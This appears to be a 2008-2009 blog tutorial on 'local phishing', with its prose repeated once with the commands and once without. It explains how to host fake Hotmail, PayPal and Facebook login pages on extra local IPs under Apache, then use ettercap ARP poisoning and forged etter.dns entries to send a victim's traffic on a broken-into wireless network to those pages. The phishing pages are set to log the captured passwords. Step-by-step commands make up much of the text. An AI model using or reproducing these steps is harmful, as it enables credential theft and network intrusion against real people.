Local Phishing
I'v never seen a tutorial on how to do this so I figured I'd make one.
Ok so you may be asking whats the point of this? Well let me tell you.
Say you broke into a wireless network and want to get some passwords.
You arp poison your victims and use an ssl stripping tool to be able to sniff passwords.
The target gets tipped off by the certificate warning. So you fail.
So you want to dsn spoof your target to a phisher.
But the problem is that you can only dns spoof to an ip address.
This means you cannot spoof them to a phisher on a free hosting domain.
You set up apache hosting your phisher and dns spoof them to your local ip.
This is great, but you're limited to only one phisher.
This tutorial will show you how to set up multiple Ip's and the set up virual hosts in apache for those ips.
Step 1: Set multiple IP's
Let's make 3. (you can have as many as you want)
Some times it will give you an error like this.
If you just type in the same command again it should work
Ok now check if they're up
you should see your new virtual interfaces. (wlan0:1, wlan0:2, wlan0:3)
Step 2: Set up apache
Create 3 folders, one for each phisher. I'll be using hotmail, paypal and facebook.
/var/www/hotmail/
/var/www/paypal/
/var/www/facebook/
put you phishers in those folders.
(When I do this I edit my phishers so they all write to one log file so it's easier to keep track of what you got.)
Now you need to edit the apache2.conf file.
Open the configuration file in there (mine was called 000-default).
Now you need to add a virtual host entry for every one of your ip addresses.
Make sure to change the ServerName and DocumentRoot to match your setup.
In my case i'll add three. (You add these to the bottom of the file)
Start apache
Open up firefox and browse to each one of your ips and make sure the phishers come up.
Step 3: Dns spoof/Arp poison with ettercap
Backup the dns_spoof configuration file
Edit the file
Start ettercap arp poison with the dns_spoof plugin
replace 192.168.1.102 with your target's ip.
replace 192.168.1.1 with your gateway ip.
replace wlan0 with your interface.
Ok so you may be asking whats the point of this? Well let me tell you.
Say you broke into a wireless network and want to get some passwords.
You arp poison your victims and use an ssl stripping tool to be able to sniff passwords.
The target gets tipped off by the certificate warning. So you fail.
So you want to dsn spoof your target to a phisher.
But the problem is that you can only dns spoof to an ip address.
This means you cannot spoof them to a phisher on a free hosting domain.
You set up apache hosting your phisher and dns spoof them to your local ip.
This is great, but you're limited to only one phisher.
This tutorial will show you how to set up multiple Ip's and the set up virual hosts in apache for those ips.
Step 1: Set multiple IP's
Let's make 3. (you can have as many as you want)
Code:
sudo ifconfig wlan0:1 up 192.168.1.123 sudo ifconfig wlan0:2 up 192.168.1.124 sudo ifconfig wlan0:3 up 192.168.1.125
Code:
SIOCSIFFLAGS: Cannot assign requested address
Ok now check if they're up
Code:
sudo ifconfig -a
Step 2: Set up apache
Code:
sudo nautilus /var/www/
/var/www/hotmail/
/var/www/paypal/
/var/www/facebook/
put you phishers in those folders.
(When I do this I edit my phishers so they all write to one log file so it's easier to keep track of what you got.)
Now you need to edit the apache2.conf file.
Code:
sudo nautilus /etc/apache2/sites-enabled/
Now you need to add a virtual host entry for every one of your ip addresses.
Make sure to change the ServerName and DocumentRoot to match your setup.
In my case i'll add three. (You add these to the bottom of the file)
Code:
ServerName 192.168.1.123 DocumentRoot /var/www/facebook/ ServerName 192.168.1.124 DocumentRoot /var/www/paypal/ ServerName 192.168.1.125 DocumentRoot /var/www/phish/hotmail/
Code:
sudo /etc/init.d/apache2 start
Step 3: Dns spoof/Arp poison with ettercap
Backup the dns_spoof configuration file
Code:
sudo mv /usr/share/ettercap/etter.dns /usr/share/ettercap/etter.dns.backup
Code:
sudo echo "www.facebook.com A 192.168.1.123" >> /usr/share/ettercap/etter.dns sudo echo "www.paypal.com A 192.168.1.124" >> /usr/share/ettercap/etter.dns sudo echo "www.hotmail.com A 192.168.1.125" >> /usr/share/ettercap/etter.dns
Code:
sudo ettercap -T -i wlan0 -M arp:remote /192.168.1.1/ /192.168.1.102/ -P dns_spoof
replace 192.168.1.1 with your gateway ip.
replace wlan0 with your interface.
# ITS ©
# 2008 - 2009
No comments:
Post a Comment